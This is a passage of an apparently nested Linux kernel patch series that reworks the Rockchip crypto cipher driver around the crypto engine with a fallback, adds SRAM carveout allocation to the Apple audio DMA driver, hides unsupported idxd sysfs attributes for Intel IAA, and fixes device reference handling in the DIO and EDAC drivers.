+-static void rk_ablk_hw_init(struct rk_crypto_info *dev)
++static void rk_ablk_hw_init(struct rk_crypto_info *dev, struct skcipher_request *req)
+ {
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+ 	struct crypto_skcipher *cipher = crypto_skcipher_reqtfm(req);
+ 	struct crypto_tfm *tfm = crypto_skcipher_tfm(cipher);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(cipher);
+-	u32 ivsize, block, conf_reg = 0;
++	u32 block, conf_reg = 0;
+ 
+ 	block = crypto_tfm_alg_blocksize(tfm);
+-	ivsize = crypto_skcipher_ivsize(cipher);
+ 
+ 	if (block == DES_BLOCK_SIZE) {
+-		ctx->mode |= RK_CRYPTO_TDES_FIFO_MODE |
++		rctx->mode |= RK_CRYPTO_TDES_FIFO_MODE |
+ 			     RK_CRYPTO_TDES_BYTESWAP_KEY |
+ 			     RK_CRYPTO_TDES_BYTESWAP_IV;
+-		CRYPTO_WRITE(dev, RK_CRYPTO_TDES_CTRL, ctx->mode);
+-		memcpy_toio(dev->reg + RK_CRYPTO_TDES_IV_0, req->iv, ivsize);
++		CRYPTO_WRITE(dev, RK_CRYPTO_TDES_CTRL, rctx->mode);
++		memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, ctx->key, ctx->keylen);
+ 		conf_reg = RK_CRYPTO_DESSEL;
+ 	} else {
+-		ctx->mode |= RK_CRYPTO_AES_FIFO_MODE |
++		rctx->mode |= RK_CRYPTO_AES_FIFO_MODE |
+ 			     RK_CRYPTO_AES_KEY_CHANGE |
+ 			     RK_CRYPTO_AES_BYTESWAP_KEY |
+ 			     RK_CRYPTO_AES_BYTESWAP_IV;
+ 		if (ctx->keylen == AES_KEYSIZE_192)
+-			ctx->mode |= RK_CRYPTO_AES_192BIT_key;
++			rctx->mode |= RK_CRYPTO_AES_192BIT_key;
+ 		else if (ctx->keylen == AES_KEYSIZE_256)
+-			ctx->mode |= RK_CRYPTO_AES_256BIT_key;
+-		CRYPTO_WRITE(dev, RK_CRYPTO_AES_CTRL, ctx->mode);
+-		memcpy_toio(dev->reg + RK_CRYPTO_AES_IV_0, req->iv, ivsize);
++			rctx->mode |= RK_CRYPTO_AES_256BIT_key;
++		CRYPTO_WRITE(dev, RK_CRYPTO_AES_CTRL, rctx->mode);
++		memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_KEY_0, ctx->key, ctx->keylen);
+ 	}
+ 	conf_reg |= RK_CRYPTO_BYTESWAP_BTFIFO |
+ 		    RK_CRYPTO_BYTESWAP_BRFIFO;
+@@ -231,146 +298,138 @@ static void rk_ablk_hw_init(struct rk_crypto_info *dev)
+ 		     RK_CRYPTO_BCDMA_ERR_ENA | RK_CRYPTO_BCDMA_DONE_ENA);
+ }
+ 
+-static void crypto_dma_start(struct rk_crypto_info *dev)
++static void crypto_dma_start(struct rk_crypto_info *dev,
++			     struct scatterlist *sgs,
++			     struct scatterlist *sgd, unsigned int todo)
+ {
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAS, dev->addr_in);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAL, dev->count / 4);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BTDMAS, dev->addr_out);
++	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAS, sg_dma_address(sgs));
++	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAL, todo);
++	CRYPTO_WRITE(dev, RK_CRYPTO_BTDMAS, sg_dma_address(sgd));
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_CTRL, RK_CRYPTO_BLOCK_START |
+ 		     _SBF(RK_CRYPTO_BLOCK_START, 16));
+ }
+ 
+-static int rk_set_data_start(struct rk_crypto_info *dev)
++static int rk_cipher_run(struct crypto_engine *engine, void *async_req)
+ {
+-	int err;
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
++	struct skcipher_request *areq = container_of(async_req, struct skcipher_request, base);
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(areq);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-	u8 *src_last_blk = page_address(sg_page(dev->sg_src)) +
+-		dev->sg_src->offset + dev->sg_src->length - ivsize;
+-
+-	/* Store the iv that need to be updated in chain mode.
+-	 * And update the IV buffer to contain the next IV for decryption mode.
+-	 */
+-	if (ctx->mode & RK_CRYPTO_DEC) {
+-		memcpy(ctx->iv, src_last_blk, ivsize);
+-		sg_pcopy_to_buffer(dev->first, dev->src_nents, req->iv,
+-				   ivsize, dev->total - ivsize);
+-	}
+-
+-	err = dev->load_data(dev, dev->sg_src, dev->sg_dst);
+-	if (!err)
+-		crypto_dma_start(dev);
+-	return err;
+-}
+-
+-static int rk_ablk_start(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	unsigned long flags;
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(areq);
++	struct scatterlist *sgs, *sgd;
+ 	int err = 0;
++	int ivsize = crypto_skcipher_ivsize(tfm);
++	int offset;
++	u8 iv[AES_BLOCK_SIZE];
++	u8 biv[AES_BLOCK_SIZE];
++	u8 *ivtouse = areq->iv;
++	unsigned int len = areq->cryptlen;
++	unsigned int todo;
++
++	ivsize = crypto_skcipher_ivsize(tfm);
++	if (areq->iv && crypto_skcipher_ivsize(tfm) > 0) {
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			offset = areq->cryptlen - ivsize;
++			scatterwalk_map_and_copy(rctx->backup_iv, areq->src,
++						 offset, ivsize, 0);
++		}
++	}
+ 
+-	dev->left_bytes = req->cryptlen;
+-	dev->total = req->cryptlen;
+-	dev->sg_src = req->src;
+-	dev->first = req->src;
+-	dev->src_nents = sg_nents(req->src);
+-	dev->sg_dst = req->dst;
+-	dev->dst_nents = sg_nents(req->dst);
+-	dev->aligned = 1;
+-
+-	spin_lock_irqsave(&dev->lock, flags);
+-	rk_ablk_hw_init(dev);
+-	err = rk_set_data_start(dev);
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-	return err;
+-}
++	sgs = areq->src;
++	sgd = areq->dst;
+ 
+-static void rk_iv_copyback(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+-	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-
+-	/* Update the IV buffer to contain the next IV for encryption mode. */
+-	if (!(ctx->mode & RK_CRYPTO_DEC)) {
+-		if (dev->aligned) {
+-			memcpy(req->iv, sg_virt(dev->sg_dst) +
+-				dev->sg_dst->length - ivsize, ivsize);
++	while (sgs && sgd && len) {
++		if (!sgs->length) {
++			sgs = sg_next(sgs);
++			sgd = sg_next(sgd);
++			continue;
++		}
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			/* we backup last block of source to be used as IV at next step */
++			offset = sgs->length - ivsize;
++			scatterwalk_map_and_copy(biv, sgs, offset, ivsize, 0);
++		}
++		if (sgs == sgd) {
++			err = dma_map_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_iv;
++			}
++		} else {
++			err = dma_map_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_iv;
++			}
++			err = dma_map_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_sgs;
++			}
++		}
++		err = 0;
++		rk_ablk_hw_init(ctx->dev, areq);
++		if (ivsize) {
++			if (ivsize == DES_BLOCK_SIZE)
++				memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_IV_0, ivtouse, ivsize);
++			else
++				memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_IV_0, ivtouse, ivsize);
++		}
++		reinit_completion(&ctx->dev->complete);
++		ctx->dev->status = 0;
++
++		todo = min(sg_dma_len(sgs), len);
++		len -= todo;
++		crypto_dma_start(ctx->dev, sgs, sgd, todo / 4);
++		wait_for_completion_interruptible_timeout(&ctx->dev->complete,
++							  msecs_to_jiffies(2000));
++		if (!ctx->dev->status) {
++			dev_err(ctx->dev->dev, "DMA timeout\n");
++			err = -EFAULT;
++			goto theend;
++		}
++		if (sgs == sgd) {
++			dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
++		} else {
++			dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++			dma_unmap_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
++		}
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			memcpy(iv, biv, ivsize);
++			ivtouse = iv;
+ 		} else {
+-			memcpy(req->iv, dev->addr_vir +
+-				dev->count - ivsize, ivsize);
++			offset = sgd->length - ivsize;
++			scatterwalk_map_and_copy(iv, sgd, offset, ivsize, 0);
++			ivtouse = iv;
+ 		}
++		sgs = sg_next(sgs);
++		sgd = sg_next(sgd);
+ 	}
+-}
+-
+-static void rk_update_iv(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+-	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-	u8 *new_iv = NULL;
+ 
+-	if (ctx->mode & RK_CRYPTO_DEC) {
+-		new_iv = ctx->iv;
+-	} else {
+-		new_iv = page_address(sg_page(dev->sg_dst)) +
+-			 dev->sg_dst->offset + dev->sg_dst->length - ivsize;
++	if (areq->iv && ivsize > 0) {
++		offset = areq->cryptlen - ivsize;
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			memcpy(areq->iv, rctx->backup_iv, ivsize);
++			memzero_explicit(rctx->backup_iv, ivsize);
++		} else {
++			scatterwalk_map_and_copy(areq->iv, areq->dst, offset,
++						 ivsize, 0);
++		}
+ 	}
+ 
+-	if (ivsize == DES_BLOCK_SIZE)
+-		memcpy_toio(dev->reg + RK_CRYPTO_TDES_IV_0, new_iv, ivsize);
+-	else if (ivsize == AES_BLOCK_SIZE)
+-		memcpy_toio(dev->reg + RK_CRYPTO_AES_IV_0, new_iv, ivsize);
+-}
++theend:
++	local_bh_disable();
++	crypto_finalize_skcipher_request(engine, areq, err);
++	local_bh_enable();
++	return 0;
+ 
+-/* return:
+- *	true	some err was occurred
+- *	fault	no err, continue
+- */
+-static int rk_ablk_rx(struct rk_crypto_info *dev)
+-{
+-	int err = 0;
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-
+-	dev->unload_data(dev);
+-	if (!dev->aligned) {
+-		if (!sg_pcopy_from_buffer(req->dst, dev->dst_nents,
+-					  dev->addr_vir, dev->count,
+-					  dev->total - dev->left_bytes -
+-					  dev->count)) {
+-			err = -EINVAL;
+-			goto out_rx;
+-		}
+-	}
+-	if (dev->left_bytes) {
+-		rk_update_iv(dev);
+-		if (dev->aligned) {
+-			if (sg_is_last(dev->sg_src)) {
+-				dev_err(dev->dev, "[%s:%d] Lack of data\n",
+-					__func__, __LINE__);
+-				err = -ENOMEM;
+-				goto out_rx;
+-			}
+-			dev->sg_src = sg_next(dev->sg_src);
+-			dev->sg_dst = sg_next(dev->sg_dst);
+-		}
+-		err = rk_set_data_start(dev);
++theend_sgs:
++	if (sgs == sgd) {
++		dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
+ 	} else {
+-		rk_iv_copyback(dev);
+-		/* here show the calculation is over without any err */
+-		dev->complete(dev->async_req, 0);
+-		tasklet_schedule(&dev->queue_task);
++		dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++		dma_unmap_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
+ 	}
+-out_rx:
++theend_iv:
+ 	return err;
+ }
+ 
+@@ -378,26 +437,34 @@ static int rk_ablk_init_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 	struct skcipher_alg *alg = crypto_skcipher_alg(tfm);
++	const char *name = crypto_tfm_alg_name(&tfm->base);
+ 	struct rk_crypto_tmp *algt;
+ 
+ 	algt = container_of(alg, struct rk_crypto_tmp, alg.skcipher);
+ 
+ 	ctx->dev = algt->dev;
+-	ctx->dev->align_size = crypto_tfm_alg_alignmask(crypto_skcipher_tfm(tfm)) + 1;
+-	ctx->dev->start = rk_ablk_start;
+-	ctx->dev->update = rk_ablk_rx;
+-	ctx->dev->complete = rk_crypto_complete;
+-	ctx->dev->addr_vir = (char *)__get_free_page(GFP_KERNEL);
+ 
+-	return ctx->dev->addr_vir ? ctx->dev->enable_clk(ctx->dev) : -ENOMEM;
++	ctx->fallback_tfm = crypto_alloc_skcipher(name, 0, CRYPTO_ALG_NEED_FALLBACK);
++	if (IS_ERR(ctx->fallback_tfm)) {
++		dev_err(ctx->dev->dev, "ERROR: Cannot allocate fallback for %s %ld\n",
++			name, PTR_ERR(ctx->fallback_tfm));
++		return PTR_ERR(ctx->fallback_tfm);
++	}
++
++	tfm->reqsize = sizeof(struct rk_cipher_rctx) +
++		crypto_skcipher_reqsize(ctx->fallback_tfm);
++
++	ctx->enginectx.op.do_one_request = rk_cipher_run;
++
++	return 0;
+ }
+ 
+ static void rk_ablk_exit_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 
+-	free_page((unsigned long)ctx->dev->addr_vir);
+-	ctx->dev->disable_clk(ctx->dev);
++	memzero_explicit(ctx->key, ctx->keylen);
++	crypto_free_skcipher(ctx->fallback_tfm);
+ }
+ 
+ struct rk_crypto_tmp rk_ecb_aes_alg = {
+@@ -406,7 +473,7 @@ struct rk_crypto_tmp rk_ecb_aes_alg = {
+ 		.base.cra_name		= "ecb(aes)",
+ 		.base.cra_driver_name	= "ecb-aes-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= AES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x0f,
+@@ -428,7 +495,7 @@ struct rk_crypto_tmp rk_cbc_aes_alg = {
+ 		.base.cra_name		= "cbc(aes)",
+ 		.base.cra_driver_name	= "cbc-aes-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= AES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x0f,
+@@ -451,7 +518,7 @@ struct rk_crypto_tmp rk_ecb_des_alg = {
+ 		.base.cra_name		= "ecb(des)",
+ 		.base.cra_driver_name	= "ecb-des-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -473,7 +540,7 @@ struct rk_crypto_tmp rk_cbc_des_alg = {
+ 		.base.cra_name		= "cbc(des)",
+ 		.base.cra_driver_name	= "cbc-des-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -496,7 +563,7 @@ struct rk_crypto_tmp rk_ecb_des3_ede_alg = {
+ 		.base.cra_name		= "ecb(des3_ede)",
+ 		.base.cra_driver_name	= "ecb-des3-ede-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -518,7 +585,7 @@ struct rk_crypto_tmp rk_cbc_des3_ede_alg = {
+ 		.base.cra_name		= "cbc(des3_ede)",
+ 		.base.cra_driver_name	= "cbc-des3-ede-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+diff --git a/drivers/dio/dio.c b/drivers/dio/dio.c
+index 0e5a5662d5a40..0a051d6568800 100644
+--- a/drivers/dio/dio.c
++++ b/drivers/dio/dio.c
+@@ -109,6 +109,12 @@ static char dio_no_name[] = { 0 };
+ 
+ #endif /* CONFIG_DIO_CONSTANTS */
+ 
++static void dio_dev_release(struct device *dev)
++{
++	struct dio_dev *ddev = container_of(dev, typeof(struct dio_dev), dev);
++	kfree(ddev);
++}
++
+ int __init dio_find(int deviceid)
+ {
+ 	/* Called to find a DIO device before the full bus scan has run.
+@@ -225,6 +231,7 @@ static int __init dio_init(void)
+ 		dev->bus = &dio_bus;
+ 		dev->dev.parent = &dio_bus.dev;
+ 		dev->dev.bus = &dio_bus_type;
++		dev->dev.release = dio_dev_release;
+ 		dev->scode = scode;
+ 		dev->resource.start = pa;
+ 		dev->resource.end = pa + DIO_SIZE(scode, va);
+@@ -252,6 +259,7 @@ static int __init dio_init(void)
+ 		if (error) {
+ 			pr_err("DIO: Error registering device %s\n",
+ 			       dev->name);
++			put_device(&dev->dev);
+ 			continue;
+ 		}
+ 		error = dio_create_sysfs_dev_files(dev);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index a2cc520225d32..90f28bda29c8b 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -21,6 +21,12 @@
+ #define NCHANNELS_MAX	64
+ #define IRQ_NOUTPUTS	4
+ 
++/*
++ * For allocation purposes we split the cache
++ * memory into blocks of fixed size (given in bytes).
++ */
++#define SRAM_BLOCK	2048
++
+ #define RING_WRITE_SLOT		GENMASK(1, 0)
+ #define RING_READ_SLOT		GENMASK(5, 4)
+ #define RING_FULL		BIT(9)
+@@ -36,6 +42,9 @@
+ #define REG_TX_STOP		0x0004
+ #define REG_RX_START		0x0008
+ #define REG_RX_STOP		0x000c
++#define REG_IMPRINT		0x0090
++#define REG_TX_SRAM_SIZE	0x0094
++#define REG_RX_SRAM_SIZE	0x0098
+ 
+ #define REG_CHAN_CTL(ch)	(0x8000 + (ch) * 0x200)
+ #define REG_CHAN_CTL_RST_RINGS	BIT(0)
+@@ -53,7 +62,9 @@
+ #define BUS_WIDTH_FRAME_2_WORDS	0x10
+ #define BUS_WIDTH_FRAME_4_WORDS	0x20
+ 
+-#define CHAN_BUFSIZE		0x8000
++#define REG_CHAN_SRAM_CARVEOUT(ch)	(0x8050 + (ch) * 0x200)
++#define CHAN_SRAM_CARVEOUT_SIZE		GENMASK(31, 16)
++#define CHAN_SRAM_CARVEOUT_BASE		GENMASK(15, 0)
+ 
+ #define REG_CHAN_FIFOCTL(ch)	(0x8054 + (ch) * 0x200)
+ #define CHAN_FIFOCTL_LIMIT	GENMASK(31, 16)
+@@ -76,6 +87,8 @@ struct admac_chan {
+ 	struct dma_chan chan;
+ 	struct tasklet_struct tasklet;
+ 
++	u32 carveout;
++
+ 	spinlock_t lock;
+ 	struct admac_tx *current_tx;
+ 	int nperiod_acks;
+@@ -92,12 +105,24 @@ struct admac_chan {
+ 	struct list_head to_free;
+ };
+ 
++struct admac_sram {
++	u32 size;
++	/*
++	 * SRAM_CARVEOUT has 16-bit fields, so the SRAM cannot be larger than
++	 * 64K and a 32-bit bitfield over 2K blocks covers it.
++	 */
++	u32 allocated;
++};
++
+ struct admac_data {
+ 	struct dma_device dma;
+ 	struct device *dev;
+ 	__iomem void *base;
+ 	struct reset_control *rstc;
+ 
++	struct mutex cache_alloc_lock;
++	struct admac_sram txcache, rxcache;
++
+ 	int irq;
+ 	int irq_index;
+ 	int nchannels;
+@@ -118,6 +143,60 @@ struct admac_tx {
+ 	struct list_head node;
+ };
+ 
++static int admac_alloc_sram_carveout(struct admac_data *ad,
++				     enum dma_transfer_direction dir,
++				     u32 *out)
++{
++	struct admac_sram *sram;
++	int i, ret = 0, nblocks;
++
++	if (dir == DMA_MEM_TO_DEV)
++		sram = &ad->txcache;
++	else
++		sram = &ad->rxcache;
++
++	mutex_lock(&ad->cache_alloc_lock);
++
++	nblocks = sram->size / SRAM_BLOCK;
++	for (i = 0; i < nblocks; i++)
++		if (!(sram->allocated & BIT(i)))
++			break;
++
++	if (i < nblocks) {
++		*out = FIELD_PREP(CHAN_SRAM_CARVEOUT_BASE, i * SRAM_BLOCK) |
++			FIELD_PREP(CHAN_SRAM_CARVEOUT_SIZE, SRAM_BLOCK);
++		sram->allocated |= BIT(i);
++	} else {
++		ret = -EBUSY;
++	}
++
++	mutex_unlock(&ad->cache_alloc_lock);
++
++	return ret;
++}
++
++static void admac_free_sram_carveout(struct admac_data *ad,
++				     enum dma_transfer_direction dir,
++				     u32 carveout)
++{
++	struct admac_sram *sram;
++	u32 base = FIELD_GET(CHAN_SRAM_CARVEOUT_BASE, carveout);
++	int i;
++
++	if (dir == DMA_MEM_TO_DEV)
++		sram = &ad->txcache;
++	else
++		sram = &ad->rxcache;
++
++	if (WARN_ON(base >= sram->size))
++		return;
++
++	mutex_lock(&ad->cache_alloc_lock);
++	i = base / SRAM_BLOCK;
++	sram->allocated &= ~BIT(i);
++	mutex_unlock(&ad->cache_alloc_lock);
++}
++
+ static void admac_modify(struct admac_data *ad, int reg, u32 mask, u32 val)
+ {
+ 	void __iomem *addr = ad->base + reg;
+@@ -466,15 +545,28 @@ static void admac_synchronize(struct dma_chan *chan)
+ static int admac_alloc_chan_resources(struct dma_chan *chan)
+ {
+ 	struct admac_chan *adchan = to_admac_chan(chan);
++	struct admac_data *ad = adchan->host;
++	int ret;
+ 
+ 	dma_cookie_init(&adchan->chan);
++	ret = admac_alloc_sram_carveout(ad, admac_chan_direction(adchan->no),
++					&adchan->carveout);
++	if (ret < 0)
++		return ret;
++
++	writel_relaxed(adchan->carveout,
++		       ad->base + REG_CHAN_SRAM_CARVEOUT(adchan->no));
+ 	return 0;
+ }
+ 
+ static void admac_free_chan_resources(struct dma_chan *chan)
+ {
++	struct admac_chan *adchan = to_admac_chan(chan);
++
+ 	admac_terminate_all(chan);
+ 	admac_synchronize(chan);
++	admac_free_sram_carveout(adchan->host, admac_chan_direction(adchan->no),
++				 adchan->carveout);
+ }
+ 
+ static struct dma_chan *admac_dma_of_xlate(struct of_phandle_args *dma_spec,
+@@ -712,6 +804,7 @@ static int admac_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, ad);
+ 	ad->dev = &pdev->dev;
+ 	ad->nchannels = nchannels;
++	mutex_init(&ad->cache_alloc_lock);
+ 
+ 	/*
+ 	 * The controller has 4 IRQ outputs. Try them all until
+@@ -801,6 +894,13 @@ static int admac_probe(struct platform_device *pdev)
+ 		goto free_irq;
+ 	}
+ 
++	ad->txcache.size = readl_relaxed(ad->base + REG_TX_SRAM_SIZE);
++	ad->rxcache.size = readl_relaxed(ad->base + REG_RX_SRAM_SIZE);
++
++	dev_info(&pdev->dev, "Audio DMA Controller\n");
++	dev_info(&pdev->dev, "imprint %x TX cache %u RX cache %u\n",
++		 readl_relaxed(ad->base + REG_IMPRINT), ad->txcache.size, ad->rxcache.size);
++
+ 	return 0;
+ 
+ free_irq:
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 7269bd54554f6..3229dfc786507 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -528,6 +528,22 @@ static bool idxd_group_attr_progress_limit_invisible(struct attribute *attr,
+ 		!idxd->hw.group_cap.progress_limit;
+ }
+ 
++static bool idxd_group_attr_read_buffers_invisible(struct attribute *attr,
++						   struct idxd_device *idxd)
++{
++	/*
++	 * Intel IAA does not support Read Buffer allocation control,
++	 * make these attributes invisible.
++	 */
++	return (attr == &dev_attr_group_use_token_limit.attr ||
++		attr == &dev_attr_group_use_read_buffer_limit.attr ||
++		attr == &dev_attr_group_tokens_allowed.attr ||
++		attr == &dev_attr_group_read_buffers_allowed.attr ||
++		attr == &dev_attr_group_tokens_reserved.attr ||
++		attr == &dev_attr_group_read_buffers_reserved.attr) &&
++		idxd->data->type == IDXD_TYPE_IAX;
++}
++
+ static umode_t idxd_group_attr_visible(struct kobject *kobj,
+ 				       struct attribute *attr, int n)
+ {
+@@ -538,6 +554,9 @@ static umode_t idxd_group_attr_visible(struct kobject *kobj,
+ 	if (idxd_group_attr_progress_limit_invisible(attr, idxd))
+ 		return 0;
+ 
++	if (idxd_group_attr_read_buffers_invisible(attr, idxd))
++		return 0;
++
+ 	return attr->mode;
+ }
+ 
+@@ -1233,6 +1252,14 @@ static bool idxd_wq_attr_op_config_invisible(struct attribute *attr,
+ 	       !idxd->hw.wq_cap.op_config;
+ }
+ 
++static bool idxd_wq_attr_max_batch_size_invisible(struct attribute *attr,
++						  struct idxd_device *idxd)
++{
++	/* Intel IAA does not support batch processing, make it invisible */
++	return attr == &dev_attr_wq_max_batch_size.attr &&
++	       idxd->data->type == IDXD_TYPE_IAX;
++}
++
+ static umode_t idxd_wq_attr_visible(struct kobject *kobj,
+ 				    struct attribute *attr, int n)
+ {
+@@ -1243,6 +1270,9 @@ static umode_t idxd_wq_attr_visible(struct kobject *kobj,
+ 	if (idxd_wq_attr_op_config_invisible(attr, idxd))
+ 		return 0;
+ 
++	if (idxd_wq_attr_max_batch_size_invisible(attr, idxd))
++		return 0;
++
+ 	return attr->mode;
+ }
+ 
+@@ -1533,6 +1563,43 @@ static ssize_t cmd_status_store(struct device *dev, struct device_attribute *att
+ }
+ static DEVICE_ATTR_RW(cmd_status);
+ 
++static bool idxd_device_attr_max_batch_size_invisible(struct attribute *attr,
++						      struct idxd_device *idxd)
++{
++	/* Intel IAA does not support batch processing, make it invisible */
++	return attr == &dev_attr_max_batch_size.attr &&
++	       idxd->data->type == IDXD_TYPE_IAX;
++}
++
++static bool idxd_device_attr_read_buffers_invisible(struct attribute *attr,
++						    struct idxd_device *idxd)
++{
++	/*
++	 * Intel IAA does not support Read Buffer allocation control,
++	 * make these attributes invisible.
++	 */
++	return (attr == &dev_attr_max_tokens.attr ||
++		attr == &dev_attr_max_read_buffers.attr ||
++		attr == &dev_attr_token_limit.attr ||
++		attr == &dev_attr_read_buffer_limit.attr) &&
++		idxd->data->type == IDXD_TYPE_IAX;
++}
++
++static umode_t idxd_device_attr_visible(struct kobject *kobj,
++					struct attribute *attr, int n)
++{
++	struct device *dev = container_of(kobj, struct device, kobj);
++	struct idxd_device *idxd = confdev_to_idxd(dev);
++
++	if (idxd_device_attr_max_batch_size_invisible(attr, idxd))
++		return 0;
++
++	if (idxd_device_attr_read_buffers_invisible(attr, idxd))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *idxd_device_attributes[] = {
+ 	&dev_attr_version.attr,
+ 	&dev_attr_max_groups.attr,
+@@ -1560,6 +1627,7 @@ static struct attribute *idxd_device_attributes[] = {
+ 
+ static const struct attribute_group idxd_device_attribute_group = {
+ 	.attrs = idxd_device_attributes,
++	.is_visible = idxd_device_attr_visible,
+ };
+ 
+ static const struct attribute_group *idxd_attribute_groups[] = {
+diff --git a/drivers/edac/i10nm_base.c b/drivers/edac/i10nm_base.c
+index a22ea053f8e1c..8af4d2523194a 100644
+--- a/drivers/edac/i10nm_base.c
++++ b/drivers/edac/i10nm_base.c
+@@ -304,11 +304,10 @@ static struct pci_dev *pci_get_dev_wrapper(int dom, unsigned int bus,
+ 	if (unlikely(pci_enable_device(pdev) < 0)) {
+ 		edac_dbg(2, "Failed to enable device %02x:%02x.%x\n",
+ 			 bus, dev, fun);
++		pci_dev_put(pdev);
+ 		return NULL;
+ 	}
+ 
+-	pci_dev_get(pdev);
+-
+ 	return pdev;
+ }
+ 
+diff --git a/drivers/extcon/extcon-usbc-tusb320.c b/drivers/extcon/extcon-usbc-tusb320.c
+index 2a120d8d3c272..9dfa545427ca1 100644
+--- a/drivers/extcon/extcon-usbc-tusb320.c
++++ b/drivers/extcon/extcon-usbc-tusb320.c
+@@ -313,9 +313,9 @@ static void tusb320_typec_irq_handler(struct tusb320_priv *priv, u8 reg9)
+ 		typec_set_pwr_opmode(port, TYPEC_PWR_MODE_USB);
